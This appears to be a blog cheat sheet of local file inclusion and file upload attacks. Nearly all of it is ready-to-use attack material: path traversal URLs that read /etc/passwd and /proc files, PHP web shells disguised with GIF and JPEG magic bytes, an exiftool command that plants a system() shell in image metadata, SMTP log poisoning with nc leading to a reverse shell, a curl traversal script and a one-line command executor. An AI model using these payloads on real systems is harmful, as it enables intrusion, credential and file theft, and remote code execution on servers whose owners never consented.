Try These for Local File Inclusion
http://10.10.10.10/?page=/etc/passw http://10.10.10.10./?page=../../../../../../../etc/passwd http://10.10.10.10/?page=php://filter/convert.base64-encode/resource=index ?url=/../../../..//etc/apache2/sites-available/000-default.conf
#View Acess logs in proc env - there is a symbolic link to some random number. so bruteforce it using intruder
?url=/../../../../proc/self/fd/§num$
File Upload Steps
1) Change the filename to php,php5
2) add the below content to the file
GIF8;
<?php echo exec("cat /etc/passwd"); ?>
or
\0xFF\0xD8\0xFF\0xE0<?php echo exec("cat /etc/passwd"); ?>3)
4) try using the wordlist
5) check for /proc/self/environ for LFI
6) <?php echo file_get_contents('/etc/passwd'); ?>
7) While Uploading the file look for "Content Disposition: form-data; name='somename'; filename="filename.jpeg""
In this case, change the filename to "filename=../filename.php"; to include a path-traversal vuln
or
filename="..%2ffilaname.php"
LFI can be exploited in the cookie
#lang is vulnerable here; Cookie: lang=../../../../etc/passwd if there is a include() function in the source code, it is vulnerable to path traversal.
LFI On SMTP
If SNMP(Port 25) port is available, there might be a chance of LFI as well. check for it., this can be done by log poisoning. use the following commands: nc VICTIM_IP 25 HELO anyname MAIL FROM:"fraek <?php echo shell_exec($_GET['cmd']);?>" RCPT TO: root DATA . Postfix smtp logs can be found at /var/log/mail now if you found a LFI //192.168.56.103/turing-bolo/bolo.php?bolo=../../../../var/log/mail&cmd= URL encode PHP or PERL reverse shell and pass it as a variableto cmd prameter. and you get a reverse shell
LFI to RCE
when you do not have access to /var/log/apache2/access.log directly when you have LFI on the target,use the below
#send the request to intruder and add proc/self/fd/§num§ and add a new position to bruteforce with numbers
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../proc/self/fd/§num$
#start the attack
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' image.jpg
Steps to Perform LFI
1.
Intercept to Burp
2.
Change Content type to image/gif
or image/jpeg
3.
Add File Signature (magic Numbers) at
the starting of the file. Example: GIF8;
GIF8;
<?php
echo exec("cat /etc/passwd");
?>
4.
Change the file extension to PHP
5.
if PHP change it to gif.PHP5, php4 or
something like that
6. if anything above doesnt work - try something like changing php to PHP or PHP5 or PHP4 or php5 or php4 ..
7. Paste your reverse shell at the end of file; let there be the file signatures of the original file.
8. In Case you are sure there is a RFI/LFI and not able to see the output in the browser,try the same with curl
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.227.130/administrator/alerts/alertConfigField.php
#!/bin/bash
_HOST=192.168.100.130
_PATH=administrator/alerts/alertConfigField.php
_PARM=urlConfig
_TRAV=../../../../../../../..
curl -s --data-urlencode "${_PARM}=${_TRAV}$1" $_HOST/$_PATH \
| sed -r 's/^ {8}//' \
| sed '71,$!d' \
| sed '$d' \
| sed '$d'
After Uploading
1. Try to run the file along with reverse shell
2. Intercept the request, if it is not a reverse shell, just a command executor
<?php system($_REQUEST['HackingDream']);?>
--> change the "Request Method" to post;
type HackingDream=whoami; will get the output in response
Comments
Post a Comment